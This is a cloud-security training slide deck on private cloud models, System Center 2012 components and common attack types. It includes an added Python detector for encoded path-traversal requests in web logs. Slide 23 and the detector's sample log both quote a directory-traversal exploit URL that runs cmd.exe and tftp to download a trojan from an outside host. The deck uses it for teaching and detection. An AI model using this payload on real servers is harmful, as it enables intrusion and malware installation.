
Securing The Cloud: What is the Cloud? How do you lock it down? Kevin King - Senior Technical Instructor ● Infrastructure/Cloud Consulting | MCT CCSI.


1 Securing The Cloud
What is the Cloud? How do you lock it down?
Kevin King - Senior Technical Instructor ● Infrastructure/Cloud Consulting | MCT CCSI MCSE-Private Cloud MCSA MCSA-Server 2012 MCSE CCNA Data Center Cisco Quality Instructor 2014
New Horizons CLC | 6700 Jefferson, Building A | Albuquerque, NM 87109 | p: 505.830.7100 | f: 505.830.2239 | kking@nhabq.com | www.nhabq.com

2
1. Introduction to the Private Cloud
2. Securing the Private Cloud

3 Overview
- Overview of the Cloud Computing Model
- Requirements for the Private Cloud
- Operating a Private Cloud Infrastructure with System Center
- Securing the Cloud

4 1) Overview of the Cloud Computing Model
- The Advent of Cloud Computing
- Public vs. Private Clouds
- Cloud Service Models
- Methods to Implement the Private Cloud
- System Center 2012 and the Private Cloud

5 The Advent of Cloud Computing
Advantages of cloud computing include:
- Virtualized data center
- Reduced operational costs
- Server consolidation
- Improved resiliency and agility
[Figure labels: Client/Server Architecture; Cloud Computing]

6 Public vs. Private Clouds
Private cloud:
- Provides more control
- Is flexible
- Is customizable
- Has operational and management costs
Public cloud:
- Provides less control
- Provides less flexibility
- Provides less customization
- Reduced operational and management costs

7

8 Cloud Service Models
The three cloud service models are:
- Software as a Service (SaaS): includes business processes and applications
- Platform as a Service (PaaS): includes application execution services
- Infrastructure as a Service (IaaS): includes server, storage, and network infrastructure

9 Methods to Implement the Private Cloud
[Figure: the methods Custom, Reference Architecture, and Service Provider, with scales for Deployment Time (High to Low) and Level of Pre-integration (Low to High)]

10 System Center 2012 and the Private Cloud
System Center 2012 has the following components:
- App Controller
- Service Manager
- Virtual Machine Manager (VMM)
- Orchestrator
- Operations Manager
- Data Protection Manager (DPM)
- Configuration Manager

11 2) Requirements for the Private Cloud
- Key Business Requirements
- Service Identification and Onboarding
- Datacenter Administrators and Business Unit IT Administrators

12 Key Business Requirements
The key business requirements include:
- Competitive advantage
- Scalability
- Reduced cost

13 Service Identification and Onboarding
Service Identification:
- Does the application need to reside in the same location as the data?
- What computer resources are required?
- What are the software or operating system requirements?
- What network bandwidth will be required by the application between the users and the cloud?
Onboarding:
- Has the service passed the identity check and is it ready for the cloud?
- Have relevant backups taken place?
- Has the migration been tested successfully in a pre-production or UAT environment?
- Is there a documented method for fallback?

14 Datacenter Administrators and Business Unit IT Administrators
The datacenter administrator:
- Manages the physical infrastructure
- Manages the private cloud resources
- Configures access to cloud resources
The business unit IT administrator:
- Manages the business unit cloud
- Manages resources specific to the business unit cloud that they own

15 3) Operating a Private Cloud Infrastructure with System Center
- Provisioning the Private Cloud with Virtual Machine Manager
- Managing Public and Private Clouds with App Controller
- Service Management with Service Manager
- Automating Data Center Processes with Orchestrator

16 Provisioning the Private Cloud with Virtual Machine Manager
A simple private cloud is created in Virtual Machine Manager by using the Create Cloud Wizard.

17 Managing Public and Private Clouds with App Controller
Using the App Controller Portal, you can manage private clouds that were created with VMM and public clouds that were created on the Windows Azure platform.

18 Service Management with Service Manager
Service Manager delivers an integrated platform for automating and adapting IT service management best practices to your organization's requirements.
By using Service Manager, you can:
- Reduce mean time to resolution of issues through a self-service user experience
- Improve private cloud efficiency through centralized management of change processes
- Provide self-service provisioning of private cloud resources
- Implement compliance controls for the management of the private cloud infrastructure

19 Automating Data Center Processes with Orchestrator
Orchestrator provides a workflow management solution for the data center that allows you to automate the creation, monitoring, and deployment of resources in your environment.
By using Orchestrator, you can:
- Automate processes in your private cloud
- Improve operational efficiency
- Connect different systems from different vendors without the knowledge of scripting languages

20 4) Securing the Private Cloud
- Old days – security = planting two firewalls
- Today – security = very complex problem

21 Types of Attacks
Including, but not limited to:
- Packet sniffing: An application that uses the promiscuous mode of the network adapter to capture all network packets.
- IP spoofing: An attack in which a hacker assumes the IP address of another host to conceal their true identity.
- Denial-of-service (DoS) attack: Aims to overwhelm a service so as to deny legitimate requests from being serviced. The service may be in the form of bandwidth, memory, or CPU. It is the most well-known of all Internet attacks, and efforts should be invested in understanding its mechanisms. Some of the more famous DoS attacks include the following:
  - Code Red
  - Blaster
  - Ping of Death
  - Trinity

22 Types of attacks
- Password attack: As its name implies, this attack intends to acquire passwords to important assets so as to cause further damage. Password attacks can be achieved through other methods previously mentioned, such as IP spoofing, or they can be achieved via brute force.
- Man-in-the-middle attack: This type of attack happens when a hacker manages to position himself between the source and the destination of a network transaction. ARP cache poisoning is one common method.
- Application attack: This type of attack happens when application software holes are exploited to gain access to a computer system. The holes may be bugs or may be TCP port numbers that are exposed.
- Port redirection attack: This type of attack makes use of a compromised host to gain access to a network that is otherwise protected.
- Blue Pilling

23 Sequence of attacks
- After a phase of probing/scanning, the hacker detects the vulnerability of the web/application server.
- The hacker exploits the vulnerability to get a shell.
- For example, to copy the Trojan onto the web/application server:
  HTTPS://www.example.com/scripts/..%c0%af../winnt/system32/cmd.exe?/c+tftp%20-i%2010.20.15.15%20GET%20trojan.exe%20trojan.exe
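
The request on slide 23 hides the path separator as %c0%af, an overlong UTF-8 encoding of "/", so a filter that only looks for "../" misses it. The Python detector below is an added example, not part of the original presentation; it flags such requests in web access logs and, going beyond the slide's single case, also undoes nested percent-encoding. The log lines, client addresses and all function names are constructed for illustration.

```python
import re
from urllib.parse import unquote_to_bytes

# 0xC0/0xC1 lead bytes only occur in overlong (non-shortest) UTF-8, which is never valid.
OVERLONG = re.compile(rb"[\xc0\xc1][\x80-\xbf]")
TRAVERSAL = re.compile(rb"\.\.[/\\]")
TOOLS = re.compile(rb"cmd\.exe|tftp", re.I)
REQUEST = re.compile(r'"[A-Z]+ (\S+) HTTP/')

def fold_overlong(raw: bytes) -> bytes:
    """Replace each 2-byte overlong sequence with the ASCII byte a lax decoder yields."""
    return OVERLONG.sub(lambda m: bytes([((m[0][0] & 0x1F) << 6) | (m[0][1] & 0x3F)]), raw)

def inspect(target: str) -> list[str]:
    """Return the findings for one request target (path plus query string)."""
    raw = target.encode("latin-1", "replace")
    for _ in range(3):  # undo nested percent-encoding, bounded to three passes
        decoded = unquote_to_bytes(raw)
        if decoded == raw:
            break
        raw = decoded
    findings = []
    if OVERLONG.search(raw):
        findings.append("overlong-utf8")
    folded = fold_overlong(raw)  # normalise before looking for "../" or "..\"
    if TRAVERSAL.search(folded):
        findings.append("traversal")
    if TOOLS.search(folded):
        findings.append("shell-or-transfer")
    return findings

def scan(lines):
    """Return (line_number, findings) for every log line with at least one finding."""
    hits = []
    for number, line in enumerate(lines, 1):
        match = REQUEST.search(line)
        found = inspect(match.group(1)) if match else []
        if found:
            hits.append((number, found))
    return hits

# Constructed sample access log; line 3 carries the request path from slide 23.
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jan/2024:10:00:00 +0000] "GET /index.html HTTP/1.1" 200 512',
    '192.0.2.11 - - [01/Jan/2024:10:00:05 +0000] "GET /caf%c3%a9/menu.html HTTP/1.1" 200 900',
    '192.0.2.66 - - [01/Jan/2024:10:01:00 +0000] "GET /scripts/..%c0%af../winnt/system32/'
    'cmd.exe?/c+tftp%20-i%2010.20.15.15%20GET%20trojan.exe%20trojan.exe HTTP/1.0" 200 0',
    '192.0.2.67 - - [01/Jan/2024:10:02:00 +0000] "GET /static/..%252f..%252fsite.cfg HTTP/1.1" 404 0',
]
print(scan(SAMPLE_LOG))
```

Valid multi-byte UTF-8 such as %c3%a9 on line 2 is not flagged, because only the lead bytes 0xC0 and 0xC1 mark an overlong two-byte sequence.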

24 Server Farm Security Strategies

25 Segmenting the Server Farm

26 Building the Firewall Ruleset

27 From Physical Separation to Logical Separation

28 Securing The Cloud
System Center 2012 has the following components:
- App Controller
- Service Manager
- Virtual Machine Manager (VMM)
- Orchestrator
- Operations Manager
- Data Protection Manager (DPM)
- Configuration Manager

29 SURFACE AREA

30 Public vs. Private Clouds
Physical:
- Physical access to equipment
- OOB Management
- Password Policy
- Host Security
Logical:
- System Center Components
- Individual VMs
- Services and Apps
- Passwords/Encryption/Least Privilege

31

